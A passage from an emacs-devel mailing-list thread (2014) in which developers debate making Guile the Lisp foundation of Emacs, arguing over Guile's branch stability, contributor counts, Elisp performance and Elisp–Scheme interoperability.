* Re: Emacs Lisp's future 2014-09-17 15:19 ` Mark H Weaver @ 2014-09-17 16:23 ` David Kastrup 2014-09-17 18:10 ` Nic Ferrier 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-17 16:23 UTC (permalink / raw) To: Mark H Weaver; +Cc: emacs-devel Mark H Weaver <mhw@netris.org> writes: > David Kastrup <dak@gnu.org> writes: > >> Mark H Weaver <mhw@netris.org> writes: >> >>> Is it really a show-stopper that Guile 2.0 has limitations in the >>> sizes of some expression types? > [...] >> Yes, this can turn into sort of a scalability problem in my book. And >> Emacs is big. > > The problem is fixed on the master branch, which is the only branch > that supports guile-emacs anyway. Ok, so guile-emacs will not work with the "stable" branch. If I take a look at the "master" branch which is the only one supporting guile-emacs, I see things like commit 2c02a21023c946a3d31c43417d440d6babbf2622 Author: Andy Wingo <wingo@pobox.com> Date: Sun Jun 29 14:29:20 2014 +0200 Remove namesets. This was a failed experiment. It had good space complexity but terrible time complexity. * module/Makefile.am: Update. * module/language/cps/nameset.scm: Remove. [...] commit ec412d75627aeffbd816ac351eabcd1b533540c6 Author: Andy Wingo <wingo@pobox.com> Date: Thu Jun 19 08:49:05 2014 +0200 Rewrite type inference pass to use namesets * module/Makefile.am: Build types.scm early, but don't block the rest of the build on it. * module/language/cps/types.scm: Rewrite to use namesets. * module/language/cps/dce.scm: * module/language/cps/type-fold.scm: Adapt to interface changes. commit 97ed2e77ab22e1695c5c4df6f5f6cfd98b90636f Author: Andy Wingo <wingo@pobox.com> Date: Sun Jun 8 18:50:07 2014 +0200 New module: (language cps nameset) * module/language/cps/nameset.scm: New file. * module/Makefile.am: Add new file. which make clear that the master branch in GUILE is _highly_ experimental. If you take a look at the GUILE developer list archives at <URL:http://lists.gnu.org/archive/html/guile-devel/2014-09/threads.html> and previous months, you'll find that Andy Wingo does not participate in any discussions there. So basically GUILE master is his private playground which he works on in bursts of activity without publicly visible communication. I don't see that basing Emacs on that kind of setup is remotely realistic without serious reorganization of how GUILE organizes and views its development processes. Emacs is a remarkably _stable_ and reliable piece of software considering its size and age. > So, why are limitations in Guile 2.0 relevant for guile-emacs? > > Incidentally, the 'drop-right' scalability problem you complain above > above is also fixed on the master branch, and plenty of others. The > reason is that our stacks are now automatically expanded as needed, > limited only by the available memory, so we can now write recursive > procedures in a natural way without ugly hacks to make them scalable. Personally, I don't consider automatically expanding stack size a "solution" to a routine unnecessarily shoving all elements of an arbitrarily large data structure interspersed with return addresses onto a VM stack before processing it. But then tastes may differ. I started programming at a time when I paid the equivalent of €400 for 64kB of RAM, so throwing RAM at a problem was expensive enough to be habit forming. > See http://wingolog.org/archives/2014/03/17/stack-overflow for more. At any rate, this is again a distraction. The topic is how suitable GUILE is for turning into the Lisp foundation of Emacs. And I think that apart from reestablishing that I am a dishonest manipulative asshole who does not know what he is talking about, we got some insights into the current state of GUILE development that may help in refining goals and obstacles in the process of making GUILE the Lisp implementation underlying Emacs. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 16:23 ` David Kastrup @ 2014-09-17 18:10 ` Nic Ferrier 0 siblings, 0 replies; 404+ messages in thread From: Nic Ferrier @ 2014-09-17 18:10 UTC (permalink / raw) To: David Kastrup; +Cc: Mark H Weaver, emacs-devel David Kastrup <dak@gnu.org> writes: > And I think that apart from reestablishing that I am a dishonest > manipulative asshole who does not know what he is talking about, we got > some insights into the current state of GUILE development that may help > in refining goals and obstacles in the process of making GUILE the Lisp > implementation underlying Emacs. LOL. Me too. Nic ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 16:59 ` David Kastrup 2014-09-16 22:58 ` Mark H Weaver @ 2014-09-17 5:04 ` mhw 2014-09-17 14:03 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: mhw @ 2014-09-17 5:04 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > That's not all that much manpower. If you take a look at the commits in > the master branch that are not merges from the stable branch, I think > that more than 90% are from Andy Wingo. That's an interesting way to pretend that Ludovic and I don't exist, by excluding merges. Why should our contributions be excluded just because they start out on the stable-2.0 branch and later flow to master by way of merges? Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 5:04 ` mhw @ 2014-09-17 14:03 ` David Kastrup 2014-09-17 14:39 ` Mark H Weaver 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-17 14:03 UTC (permalink / raw) To: mhw; +Cc: emacs-devel mhw@netris.org writes: > David Kastrup <dak@gnu.org> writes: > >> That's not all that much manpower. If you take a look at the commits in >> the master branch that are not merges from the stable branch, I think >> that more than 90% are from Andy Wingo. > > That's an interesting way to pretend that Ludovic and I don't exist, by > excluding merges. Work on the stable branch is supposedly maintenance rather than forward-looking development. It's actually a good sign for a project's stability if more people work on maintenance than on new things. But I was commenting on the amount of manpower getting work done on new things. > Why should our contributions be excluded just because they start out > on the stable-2.0 branch and later flow to master by way of merges? Would you claim that the stable-2.0 branch is where new developments are generally done? That would seem like a somewhat unusual development model. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 14:03 ` David Kastrup @ 2014-09-17 14:39 ` Mark H Weaver 2014-09-17 15:11 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-09-17 14:39 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > mhw@netris.org writes: > >> David Kastrup <dak@gnu.org> writes: >> >>> That's not all that much manpower. If you take a look at the commits in >>> the master branch that are not merges from the stable branch, I think >>> that more than 90% are from Andy Wingo. >> >> That's an interesting way to pretend that Ludovic and I don't exist, by >> excluding merges. > > Work on the stable branch is supposedly maintenance rather than > forward-looking development. > > It's actually a good sign for a project's stability if more people work > on maintenance than on new things. But I was commenting on the amount > of manpower getting work done on new things. Plenty of "new things" have been added to the stable-2.0 branch. Just read the NEWS file for 2.0. http://git.savannah.gnu.org/gitweb/?p=guile.git;a=blob_plain;f=NEWS;hb=stable-2.0 >> Why should our contributions be excluded just because they start out >> on the stable-2.0 branch and later flow to master by way of merges? > > Would you claim that the stable-2.0 branch is where new developments are > generally done? That would seem like a somewhat unusual development > model. Yes, it's unusual, but whenever possible we add new modules and other features to the stable-2.0 branch, so that users of 2.0 will benefit from them. The exceptions are: * Work related to the new compiler/VM, which have changed substantially on the master branch. * Disruptive changes that carry a significant risk of adding new bugs. * Changes that would break API or ABI compatibility. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 14:39 ` Mark H Weaver @ 2014-09-17 15:11 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-09-17 15:11 UTC (permalink / raw) To: Mark H Weaver; +Cc: emacs-devel Mark H Weaver <mhw@netris.org> writes: > David Kastrup <dak@gnu.org> writes: > >> mhw@netris.org writes: >> >>> David Kastrup <dak@gnu.org> writes: >>> >>>> That's not all that much manpower. If you take a look at the commits in >>>> the master branch that are not merges from the stable branch, I think >>>> that more than 90% are from Andy Wingo. >>> >>> That's an interesting way to pretend that Ludovic and I don't exist, by >>> excluding merges. >> >> Work on the stable branch is supposedly maintenance rather than >> forward-looking development. >> >> It's actually a good sign for a project's stability if more people work >> on maintenance than on new things. But I was commenting on the amount >> of manpower getting work done on new things. > > Plenty of "new things" have been added to the stable-2.0 branch. > Just read the NEWS file for 2.0. > > http://git.savannah.gnu.org/gitweb/?p=guile.git;a=blob_plain;f=NEWS;hb=stable-2.0 That also lists plenty of things that have been _removed_ during the stable-2.0 branch, breaking existing uses of it: Making the vector interface operate only on a single representation will allow future versions of Guile to compile loops involving vectors to more efficient native code. ** 'htons', 'htonl', 'ntohs', 'ntohl' These procedures, like their C counterpart, were used to convert numbers to/from network byte order, typically in conjunction with the now-deprecated uniform vector API. This functionality is now covered by the bytevector and binary I/O APIs. See "Interpreting Bytevector Contents as Integers" in the manual. ** 'gc-live-object-stats' It hasn't worked in the whole 2.0 series. There is no replacement, unfortunately. ** 'scm_c_program_source' This internal VM function was not meant to be public. Use 'scm_procedure_source' instead. For me personally, LilyPond's ongoing efforts to port to GUILE-2.0 have been bitten by ** `define-public' is no a longer curried definition by default The (ice-9 curried-definitions) should be used for such uses. See the manual for details. It's noteworthy that the replacement (ice-9 curried-definitions) is not working correctly in the current version of GUILE distributed in Ubuntu and there are in fact _still_ broken functions in current stable-2.0. Making a "stable" branch a moving target where functionality gets removed leads to situations where code linking libguile dynamically stops working. That kind of policy would likely also end up to be problematic for Emacs. >>> Why should our contributions be excluded just because they start out >>> on the stable-2.0 branch and later flow to master by way of merges? >> >> Would you claim that the stable-2.0 branch is where new developments >> are generally done? That would seem like a somewhat unusual >> development model. > > Yes, it's unusual, but whenever possible we add new modules and other > features to the stable-2.0 branch, so that users of 2.0 will benefit > from them. The exceptions are: > > * Work related to the new compiler/VM, which have changed substantially > on the master branch. > > * Disruptive changes that carry a significant risk of adding new bugs. > > * Changes that would break API or ABI compatibility. Like removing functionality or moving it to separate modules? At the current point of time, GUILE is a project that is mostly catering for itself, so breaking its own rules whenever it is convenient affects a limited circle outside of GUILE. If GUILE wants to posit itself as basic infrastructure for the GNU project, this setup is going to lead to more problems than it does now. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier ` (2 preceding siblings ...) 2014-09-16 16:59 ` David Kastrup @ 2014-09-17 10:48 ` Lars Magne Ingebrigtsen 2014-09-17 10:53 ` Nic Ferrier 2014-09-17 11:17 ` Phillip Lord ` (4 subsequent siblings) 8 siblings, 1 reply; 404+ messages in thread From: Lars Magne Ingebrigtsen @ 2014-09-17 10:48 UTC (permalink / raw) To: Stefan Monnier; +Cc: Christopher Allan Webber, emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > The only standard language into which Elisp can evolve, AFAICT, is > Common Lisp. [ Now some readers get disappointed, while some others > become excited. ] Yay, excited. I think there's a somewhat greater cultural overlap between Emacs Lisp and Common Lisp people ("get things done") than between Emacs Lisp people and Scheme people ("interesting academically"). Anyway, I think the dangled sorta-promise that Emacs would eventually shift to Guile might have stifled Emacs Lisp development. Whenever somebody has brought up the issue of evolving Emacs Lisp (to multi-threadedness or whatever's fun), they're usually discouraged by others piping in with "oh, Emacs is moving to Guile, anyway, so don't bother". Perhaps if we just say firmly "Emacs Lisp is Emacs Lisp, and should evolve in a Common Lisp direction, but without the whole-sale porting to a third-party system: Please start hacking now" we'd attract people interested in doing low-level language stuff. Doesn't that sound like a fun opportunity? *crosses fingers* -- (domestic pets only, the antidote for overdose, milk.) bloggy blog: http://lars.ingebrigtsen.no ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 10:48 ` Lars Magne Ingebrigtsen @ 2014-09-17 10:53 ` Nic Ferrier 2014-09-17 11:21 ` David Kastrup 2014-09-17 11:22 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Nic Ferrier @ 2014-09-17 10:53 UTC (permalink / raw) To: emacs-devel Lars Magne Ingebrigtsen <larsi@gnus.org> writes: > I think there's a somewhat greater cultural overlap between Emacs Lisp > and Common Lisp people ("get things done") than between Emacs Lisp > people and Scheme people ("interesting academically"). > > Anyway, I think the dangled sorta-promise that Emacs would eventually > shift to Guile might have stifled Emacs Lisp development. Whenever > somebody has brought up the issue of evolving Emacs Lisp (to > multi-threadedness or whatever's fun), they're usually discouraged by > others piping in with "oh, Emacs is moving to Guile, anyway, so don't > bother". I don't think that's true. From my perspective, what's stopping more people getting involved is the community, which is sometimes quite negative and the tooling, which is baroque. The tooling is being fixed. I am *very* excited about that. I hope the tooling will bring more people which will re-energize the current community and add positivity. Nic ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 10:53 ` Nic Ferrier @ 2014-09-17 11:21 ` David Kastrup 2014-09-17 11:22 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-09-17 11:21 UTC (permalink / raw) To: emacs-devel Nic Ferrier <nferrier@ferrier.me.uk> writes: > Lars Magne Ingebrigtsen <larsi@gnus.org> writes: > >> I think there's a somewhat greater cultural overlap between Emacs Lisp >> and Common Lisp people ("get things done") than between Emacs Lisp >> people and Scheme people ("interesting academically"). >> >> Anyway, I think the dangled sorta-promise that Emacs would eventually >> shift to Guile might have stifled Emacs Lisp development. Whenever >> somebody has brought up the issue of evolving Emacs Lisp (to >> multi-threadedness or whatever's fun), they're usually discouraged by >> others piping in with "oh, Emacs is moving to Guile, anyway, so don't >> bother". > > I don't think that's true. > > From my perspective, what's stopping more people getting involved is the > community, which is sometimes quite negative and the tooling, which is > baroque. Well, let's take a comparison: git shortlog -s --since "1 month ago" origin/master in a current GUILE repository gives 2 Andy Wingo while in a current Emacs repository it gives 4 Alan Mackenzie 1 Alp Aker 4 Christoph Scholtes 1 Christopher Schmidt 5 Daniel Colascione 1 Detlev Zundel 27 Dmitry Antipov 50 Eli Zaretskii 1 Fabián Ezequiel Gallina 26 Glenn Morris 1 Ivan Shmakov 5 Jan D. 1 Jay Belanger 1 João Távora 1 Kan-Ru Chen 1 Karol Ostrovsky 3 Katsumi Yamaoka 8 Ken Brown 1 Ken Olum 1 Lars Ljung 2 Lars Magne Ingebrigtsen 4 Leo Liu 15 Michael Albinus 1 Michael Heerdegen 34 Paul Eggert 1 Rasmus Pank Roulund 1 Reuben Thomas 9 Sam Steingold 16 Stefan Monnier 2 Thierry Volpiatto 1 YAMAMOTO Mitsuharu 8 martin rudalics That does not particularly make Emacs look like a project keeping people from getting involved. Of course, the project/repository structure of both projects is different, but the basic idea that forward-looking development happens in the master branch is loosely common to both. If we take GNU LilyPond, incidentally based on GUILE 1.8, for reference, we get something like git shortlog -s --since "1 month ago" origin 60 David Kastrup 4 James Lowe 6 Janek Warchoł 3 Jean-Charles Malahieude 4 Julien Rioux 5 Keith OHara 19 Phil Holmes 3 Trevor Daniels 1 Walter Garcia-Fontes Now this is a project that has to suffer from a lead developer who is considered to be sometimes (or more) quite negative, and the tooling, namely GUILE 1.8 which is considered outdated and unmaintained for something like 5 years or so, can also be called baroque. The result is a quite more peaked distribution of contributions per developer than with Emacs which has sort of a plateau at the top. So I think that the news of Emacs' demise due to the named reasons is quite exaggerated. There is always room for improvement, of course, but no particular need to panic. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 10:53 ` Nic Ferrier 2014-09-17 11:21 ` David Kastrup @ 2014-09-17 11:22 ` Eli Zaretskii 2014-09-17 13:50 ` Phillip Lord 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-09-17 11:22 UTC (permalink / raw) To: Nic Ferrier; +Cc: emacs-devel > From: Nic Ferrier <nferrier@ferrier.me.uk> > Date: Wed, 17 Sep 2014 11:53:16 +0100 > > I hope the tooling will bring more people which will re-energize the > current community and add positivity. Sorry, but I will believe it when I see it. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 11:22 ` Eli Zaretskii @ 2014-09-17 13:50 ` Phillip Lord 0 siblings, 0 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-17 13:50 UTC (permalink / raw) To: Eli Zaretskii; +Cc: Nic Ferrier, emacs-devel Eli Zaretskii <eliz@gnu.org> writes: >> From: Nic Ferrier <nferrier@ferrier.me.uk> >> Date: Wed, 17 Sep 2014 11:53:16 +0100 >> >> I hope the tooling will bring more people which will re-energize the >> current community and add positivity. > > Sorry, but I will believe it when I see it. When I started coding clojure a couple of years ago, I went through a process of rediscovering the state of the art in Emacs even though I have been using it for 20 years; not just the Clojure specific stuff, but things like magit. In terms of tooling, I would argue strongly that package.el and more recently MELPA stable have made a significant difference to the community. It is now incredibly easy for me to update one of my packages, do a release and have it in peoples hands. I write code in the first instance for my own benefit. Decreasing the additional effort that I need to make to release it to others is an important contribution. I am with Nic; I think it's already happening. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier ` (3 preceding siblings ...) 2014-09-17 10:48 ` Lars Magne Ingebrigtsen @ 2014-09-17 11:17 ` Phillip Lord 2014-09-17 11:35 ` Nic Ferrier ` (3 more replies) 2014-09-17 12:46 ` Eric Brown ` (3 subsequent siblings) 8 siblings, 4 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-17 11:17 UTC (permalink / raw) To: Stefan Monnier; +Cc: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > First, of course we can keep on evolving Elisp on its own. This has > worked OK for the last 30 years, so it's not such a terrible choice. > The main problems I see with that: > - Elisp is slow and as CPUs aren't getting faster, its slowness makes itself > noticed more often. I've been going through some 10 year old elisp of mine recently. The thing that surprises me is how many times I mention performance in it. I rarely worry about this these days. Elisp performance as is seems rarely an issue. Where I would say that there is an issue is that too much of Emacs is written in C. Having a faster elisp would allow moving more into lisp and thus having more of Emacs extensible dynamically. > - Lack of some features, most notably FFI and concurrency. > - Lack of manpower. I'd add a fourth. People who want to extend Emacs for their own purposes have to learn it. Having JS extensibility would be an enourmous win. > So if we go for Guile-Emacs, we'll be stuck with Guile, i.e. we'd > have (old and new) packages that use Elisp, new packages that use > Scheme, maybe yet other new packages that use, say, Javascript (or some > other language support by Guile). That would make the work of Emacs > (and GNU ELPA) maintenance harder. Thinking of Emacs as an entire ecosystem, most of Emacs is already maintained independently from either Emacs core or GNU ELPA. For common languages (like Javascript), the maintaince might be ligtened because more people would be available. Of course, it is worth mentioning that some of the big advantages from a language like Javascript come from the implementation. A guile based implementation wouldn't benefit from the intensive JS VM development that has happend over the years. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 11:17 ` Phillip Lord @ 2014-09-17 11:35 ` Nic Ferrier 2014-09-17 12:50 ` Stefan Monnier ` (2 subsequent siblings) 3 siblings, 0 replies; 404+ messages in thread From: Nic Ferrier @ 2014-09-17 11:35 UTC (permalink / raw) To: Phillip Lord; +Cc: Stefan Monnier, emacs-devel phillip.lord@newcastle.ac.uk (Phillip Lord) writes: > I'd add a fourth. People who want to extend Emacs for their own purposes > have to learn it. Having JS extensibility would be an enourmous win. From what I've seen that isn't true. Most people learn just enough to fix their problem. Emacs Lisp is many people's least understood practical language (by which I mean, they understand enough to do something with it). A bit like Javascript used to be (how do I verify a form before it submits again?) Nic ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 11:17 ` Phillip Lord 2014-09-17 11:35 ` Nic Ferrier @ 2014-09-17 12:50 ` Stefan Monnier 2014-09-17 13:54 ` Phillip Lord 2014-09-17 15:07 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 20:21 ` Richard Stallman 2014-09-17 22:49 ` Daniel Colascione 3 siblings, 2 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 12:50 UTC (permalink / raw) To: Phillip Lord; +Cc: emacs-devel > I've been going through some 10 year old elisp of mine recently. > The thing that surprises me is how many times I mention performance in > it. I rarely worry about this these days. Elisp performance as is > seems rarely an issue. I think this reflects 2 things: - machines still did get faster over the last 10 years (much less so than over the preceding 10 years, but also probably much more so than over the next 10 years). - you've internalized Elisp performance sufficiently that you self-censor yourself such that you don't bump into it. > Where I would say that there is an issue is that too much of Emacs is > written in C. Having a faster elisp would allow moving more into lisp > and thus having more of Emacs extensible dynamically. That's part of the idea, yes. > I'd add a fourth. People who want to extend Emacs for their own purposes > have to learn it. Having JS extensibility would be an enourmous win. I'm far from convinced. It may seem that way if you don't think too hard about what it would look like, but once you realize that your JS hacker will have to learn how to manipulate Elisp lists, Elisp vectors, Elisp symbols, how to access Elisp functions and Elisp variables ... That JS code won't look very much like your typical JS code. It will be so baroque that they will "have to learn it". And they may even hate it more (because it surely will look ugly). Interoperability between languages is *hard*. Doing it so the result is lightweight and elegant (and moderately efficient) is rarely possible. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 12:50 ` Stefan Monnier @ 2014-09-17 13:54 ` Phillip Lord 2014-09-17 14:24 ` Eli Zaretskii 2014-09-17 15:09 ` Stefan Monnier 2014-09-17 15:07 ` Taylan Ulrich Bayirli/Kammer 1 sibling, 2 replies; 404+ messages in thread From: Phillip Lord @ 2014-09-17 13:54 UTC (permalink / raw) To: Stefan Monnier; +Cc: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: >> I've been going through some 10 year old elisp of mine recently. >> The thing that surprises me is how many times I mention performance in >> it. I rarely worry about this these days. Elisp performance as is >> seems rarely an issue. > > I think this reflects 2 things: > - machines still did get faster over the last 10 years (much less so > than over the preceding 10 years, but also probably much more so than > over the next 10 years). Well, Emacs is a text editor. The CPU demands of the task haven't increased that much over the last 10 years either. > - you've internalized Elisp performance sufficiently that you > self-censor yourself such that you don't bump into it. Have you looked at any of my code recently? Still, yes, you may have a point. > >> Where I would say that there is an issue is that too much of Emacs is >> written in C. Having a faster elisp would allow moving more into lisp >> and thus having more of Emacs extensible dynamically. > > That's part of the idea, yes. > >> I'd add a fourth. People who want to extend Emacs for their own purposes >> have to learn it. Having JS extensibility would be an enourmous win. > > I'm far from convinced. It may seem that way if you don't think too > hard about what it would look like, but once you realize that your JS > hacker will have to learn how to manipulate Elisp lists, Elisp vectors, > Elisp symbols, how to access Elisp functions and Elisp variables ... > > That JS code won't look very much like your typical JS code. It will be > so baroque that they will "have to learn it". And they may even hate it > more (because it surely will look ugly). > > Interoperability between languages is *hard*. Doing it so the result is > lightweight and elegant (and moderately efficient) is rarely possible. Yes, you are absolutely right. I am using Clojure for its Java interop at the moment, and it has been done well. Replicating that would be no mean feat. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 13:54 ` Phillip Lord @ 2014-09-17 14:24 ` Eli Zaretskii 2014-09-17 14:30 ` David Kastrup 2014-09-17 15:10 ` Phillip Lord 2014-09-17 15:09 ` Stefan Monnier 1 sibling, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-09-17 14:24 UTC (permalink / raw) To: Phillip Lord; +Cc: monnier, emacs-devel > From: phillip.lord@newcastle.ac.uk (Phillip Lord) > Date: Wed, 17 Sep 2014 14:54:22 +0100 > Cc: emacs-devel@gnu.org > > > - machines still did get faster over the last 10 years (much less so > > than over the preceding 10 years, but also probably much more so than > > over the next 10 years). > > Well, Emacs is a text editor. The CPU demands of the task haven't > increased that much over the last 10 years either. You are wrong here. Emacs 23 added many CPU-intensive features, like visual-line-mode. Emacs 24 added bidirectional display, which makes redisplay need roughly twice as much juice as Emacs 23 needed. And these are only two examples that pop up in my head after a 3-sec thought; I'm sure there are more. So it's not like we use up every additional CPU cycle the chips are giving us, but we are certainly using significantly more than we did 10 years ago. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 14:24 ` Eli Zaretskii @ 2014-09-17 14:30 ` David Kastrup 2014-09-17 15:03 ` Eli Zaretskii 2014-09-17 15:10 ` Phillip Lord 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-17 14:30 UTC (permalink / raw) To: emacs-devel Eli Zaretskii <eliz@gnu.org> writes: > You are wrong here. Emacs 23 added many CPU-intensive features, like > visual-line-mode. Emacs 24 added bidirectional display, which makes > redisplay need roughly twice as much juice as Emacs 23 needed. And > these are only two examples that pop up in my head after a 3-sec > thought; I'm sure there are more. > > So it's not like we use up every additional CPU cycle the chips are > giving us, but we are certainly using significantly more than we did > 10 years ago. One of the most costly changes was post 20.2 (?) when buffer and string positions became expressed as character offsets rather than byte offsets. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 14:30 ` David Kastrup @ 2014-09-17 15:03 ` Eli Zaretskii 0 siblings, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-09-17 15:03 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel > From: David Kastrup <dak@gnu.org> > Date: Wed, 17 Sep 2014 16:30:44 +0200 > > One of the most costly changes was post 20.2 (?) when buffer and string > positions became expressed as character offsets rather than byte > offsets. Yes, well, but that was more than 10 years ago (1997, if you are right and it was 20.2). ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 14:24 ` Eli Zaretskii 2014-09-17 14:30 ` David Kastrup @ 2014-09-17 15:10 ` Phillip Lord 2014-09-18 7:54 ` Thorsten Jolitz 1 sibling, 1 reply; 404+ messages in thread From: Phillip Lord @ 2014-09-17 15:10 UTC (permalink / raw) To: Eli Zaretskii; +Cc: monnier, emacs-devel Eli Zaretskii <eliz@gnu.org> writes: >> From: phillip.lord@newcastle.ac.uk (Phillip Lord) >> Date: Wed, 17 Sep 2014 14:54:22 +0100 >> Cc: emacs-devel@gnu.org >> >> > - machines still did get faster over the last 10 years (much less so >> > than over the preceding 10 years, but also probably much more so than >> > over the next 10 years). >> >> Well, Emacs is a text editor. The CPU demands of the task haven't >> increased that much over the last 10 years either. > > You are wrong here. Emacs 23 added many CPU-intensive features, like > visual-line-mode. Emacs 24 added bidirectional display, which makes > redisplay need roughly twice as much juice as Emacs 23 needed. And > these are only two examples that pop up in my head after a 3-sec > thought; I'm sure there are more. > > So it's not like we use up every additional CPU cycle the chips are > giving us, but we are certainly using significantly more than we did > 10 years ago. What can I say? I don't sit around waiting for emacs to do stuff nowadays when I am using it. And I've just implemented a package that copies, then searches and replaces an entire buffer on every keypress. And I don't notice it running for moderate size files. The manual talks about the performance danger of overlay, but I've just put an overlay an every word in a 300 line buffer, and I can't notice that either. Even though Emacs now takes considerably more than Eight Megabytes, it is not Constantly Swapping. CPU has grown quicker than Emacs demands. Phil ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 15:10 ` Phillip Lord @ 2014-09-18 7:54 ` Thorsten Jolitz 0 siblings, 0 replies; 404+ messages in thread From: Thorsten Jolitz @ 2014-09-18 7:54 UTC (permalink / raw) To: emacs-devel phillip.lord@newcastle.ac.uk (Phillip Lord) writes: > The manual talks about the performance danger of overlay, but I've just > put an overlay an every word in a 300 line buffer, and I can't notice > that either. I had a different experience when I tried to implement org-hlc.el (Org Hidden Line Cookies [fn:1]) with overlays and buffer change hooks. I always test with a 7000+ lines elisp file, and user experience was pretty close to 'unusable' in a file of that size, so I came to the conclusion that Emacs perfomance is actually quite limited in that area. * Footnotes [fn:1] org-hlc shows the number of hidden lines in a folded subtree in little cookie that looks like this [#20] in the folded headline. -- cheers, Thorsten ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 13:54 ` Phillip Lord 2014-09-17 14:24 ` Eli Zaretskii @ 2014-09-17 15:09 ` Stefan Monnier 1 sibling, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 15:09 UTC (permalink / raw) To: Phillip Lord; +Cc: emacs-devel > Well, Emacs is a text editor. The CPU demands of the task haven't > increased that much over the last 10 years either. Remember when Emacs was the big&slow editor? Now compare Emacs to Eclipse and you'll see that the resources that can be used for "text editing" are ... limitless Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 12:50 ` Stefan Monnier 2014-09-17 13:54 ` Phillip Lord @ 2014-09-17 15:07 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 15:33 ` David Kastrup ` (2 more replies) 1 sibling, 3 replies; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-17 15:07 UTC (permalink / raw) To: Stefan Monnier; +Cc: Phillip Lord, emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > Interoperability between languages is *hard*. Doing it so the result > is lightweight and elegant (and moderately efficient) is rarely > possible. Well, the Elisp and Scheme integration is pretty great. Maybe you know all of the following, but for those who didn't: - There's no data type conversion because the same object in memory is the right type in both languages, including procedures/functions. - A convenient `import-guile-module' syntax in Elisp could be implemented relatively trivially, which would walk a module and put procedure bindings into the function namespace and other bindings into the variable namespace of Elisp (both with a user-provided prefix). So you can have the API of any Guile module in Elisp as if it were just an Elisp library. - There's simply no efficiency issue. After you import something from the other language, you just have it; it's indistinguishable from something you defined in the current language, analogous to how C implemented functions (subrs) are generally indistinguishable from Elisp implemented functions; they're now all "libguile procedure objects." - I can trivially import the Elisp function and variable namespaces in Scheme code with a pair of different prefixes. I then have the whole Elisp API in my Scheme code, sans Elisp macros. And here some issues, maybe-issues, and non-issues we have: - Currently strings are an exception to the first point. I hope that won't be too difficult to fix. - The handling of nil vs. Scheme #f and '() is admittedly a wart, but will probably remain hidden, not causing issues in code you write. - Currently Guile's Elisp implementation is buggy and slow in some things, but this is unrelated to the interoperation of the languages. - Conceptually, Scheme macros can work in Elisp. Might need some work to actually make this work, or it might be trivial; I don't know. - The biggest long-term issue might be that Elisp macros will not work in Scheme, and this is relevant only to people who want to use Elisp APIs in Scheme, not affecting Elisp users. If Guile-Emacs succeeds, you really will be able to (import-guile-module (gl) gl-) ;`gl-' is the prefix and write OpenGL code in Elisp. You can probably already do that in the current state of Guile-Emacs, except that `import-guile-module' needs to be implemented; for now you can individually do e.g.: (defalias 'gl-set-draw-buffer (guile-ref (gl) set-gl-draw-buffer)) I think this is worth pursuing. It opens Emacs to a whole new world. Yes, a lot 